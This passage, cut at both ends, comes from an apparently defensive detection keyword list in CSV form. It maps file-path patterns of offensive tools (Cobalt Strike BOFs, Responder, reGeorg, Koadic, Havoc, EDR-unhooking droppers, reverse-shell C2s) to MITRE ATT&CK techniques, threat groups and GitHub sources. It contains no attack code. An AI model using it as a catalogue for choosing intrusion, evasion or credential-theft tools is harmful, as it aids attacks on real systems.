- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/ReflectiveNtdll.git*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*/RefleXXion.git*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*/reGeorg.git*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*/RegistryPersistence.c*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/Registry-Recon/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Registry-Recon,1,1,N/A,10,10,314,36,2022-06-06T14:39:12Z,2021-07-29T18:47:23Z -*/regreeper.jpg*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*/Reg-Restore-Persistence-Mole*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*/regsvcs/meterpreter*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/regsvr.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/regsvr32/shellcode_inject*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/releases/download/*/abc.exe*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*/releases/latest/download/lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*/Remote/adcs_request/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/office_tokens/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/procdump/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/ProcessDestroy/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/ProcessListHandles/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/schtaskscreate/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/schtasksrun/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/setuserpass/,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/setuserpass/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/unexpireuser/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/remote-method-guesser.git*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*/RemoteOps.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/remotereg.c*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/remotereg.o*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/remoteshell.py*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*/resolveall.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/resources/PROCEXP.sys*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*/resources/selfdestruction*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/Responder.git*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/responder/Responder.conf *,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/Responder/Responder.conf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Responder/Responder.conf*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/Responder-master.zip*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/returnvar/wce/*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*/rev_shell.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*/reverse-index.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - 